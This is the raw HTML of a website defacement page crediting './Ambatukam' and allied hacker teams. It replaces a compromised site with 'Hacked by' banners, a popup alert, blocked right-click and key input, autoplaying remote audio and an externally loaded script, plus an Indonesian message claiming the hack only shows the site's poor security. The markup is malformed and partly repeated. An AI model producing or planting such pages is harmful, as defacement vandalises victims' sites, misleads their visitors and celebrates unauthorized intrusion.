html><head> 
‎</script>
‎
‎<center><marquee behavior="scroll" direction="left" scrollamount="100" scrolldelay="100" width="100%"><font color="red">==============================================</font></marquee>
‎<font size="15" color="white"><blink> WHITE</blink></font><font size="15" color="blue"><blink></blink></font><font size="15" color="white"><blink></blink></font><font size="15" color="blue"><blink>HAT</blink></font>
‎<marquee behavior="scroll" direction="right" scrollamount="100" scrolldelay="100" width="100%"><font color="white">======================================================</font></marquee></center>
‎  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
‎  <meta property="og:image" content="aileen.png"> 
‎  <meta property="og:title" content="Hacked by ./Ambatukam😹"> 
‎  <meta property="og:description" content="Hacker Ambatukam😹"> 
‎  <title>Hacked by ./Ambatukam</title> 
‎<head>
‎<meta charset="utf-8">
‎<meta name="description" content="Hacked by ./Ambatukam☠️
‎">
‎<meta name="keywords" content="Hacked by ./Ambatukam☠️">
‎<title>Hacked By ./Ambatukam☠️</title>
‎<script language="JavaScript">alert(" ASSALAMUALAIKUM ==> WELCOME BY      ./Ambatukam😹️ ");</script>
‎<style>
‎
‎body{
‎ background: black;
‎}
‎#font{
‎ font-family:Courier;
‎ color:white;
‎ position:absolute;
‎ leftn:0;
‎ left:0;
‎ right:0;
‎ top:10%;
‎}
‎img {
‎ opacity:0.5;-webkit-transition:all 250ms ease;-moz-transition:all 250ms ease;-o-transition:all 250ms ease;transition:all 250ms ease;
‎ margin-top:-10px;
‎}
‎img:hover{ 
‎ opacity:1
‎}
‎hr {
‎ width:250px;
‎}
‎a{
‎ color:white;
‎ text-decoration:none
‎}
‎a.hover{
‎ color:white;
‎}
‎</style>
‎</head>
‎<body><center><br>
‎<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
‎<div id='font' align="center">
‎<div id=''>
‎<br>
‎<img src="https://l.top4top.io/p_29457sidc0.jpg"width="700"height="700">
‎<br>
‎<font color='#9E9E9E' size="10"><font color='#9E9E9E'> ./AmbaTukam☠️<font color='#9E9E9E'></font>
‎<font style="color:blue;text-shadow:blue 0px 0px 10px" size="8"><br> TEAM ./T.C.C🕊️🇸🇦 </font>
‎</div>
‎<table width=820px>
‎<td align=center>
‎<span style='font: 15px Courier;size:15px;color:#9E9E9E;'>
‎<strong>
‎<marquee behavior="alternate" scrollamount="5" style="border:1px solid;" width="80%"><font color="gold" face="courier">-=|[THANK TO TEAM : /.Indonesian Anonymous | /.Esteem Restoration Eagle | /.Comunity Cyber Dragon Team | /.X-MODS | /.Jatim Redstrorm Xploit | ./Bug Hunter ]|=-</center></font></marquee></div>
‎
‎<p />
‎<
‎<
‎<
‎<font color="white" size="5">&copy; 2023 ./GhostX-Mods☠️</font></a>
‎>
‎>
‎>
‎<p />
‎<embed src="https://youtu.be/FWTJrBK2bd0?si=yBFrh9UwGmJSGkSU" type="application/x-shockwave-flash" wmode="transparent" width="0" height="0"></embed>
‎</div>
‎</body>
‎<script tipe="text/javascript"src="http://htmlfreecodes.com/codes/rain.js"></script>
‎<center><audio autoplay="autoplay" controls="controls" src="https://l.top4top.io/m_29457moz50.mp3"></audio></a></center>
‎<font style="color:white;text-shadow:blue 0px 5px 8px" size="10"><br>"Hallo Situs Ini Di Hack Oleh ./REYMON BERAK"<br></font>
‎<font size="8">☠️</font></a>
‎<font><p style="color:red 2px 4px 5px" size="6"> Saya Tidak Bermaksud Merusak Website Anda Saya Hanya Ingin Anda Memperketat Keamanan Web Anda. Saya Deface Sebagai Tanda Bahwa Web Anda Sedang Tidak Aman</p></font>
‎<center
‎<html><head> 
‎</script>
‎<a href=text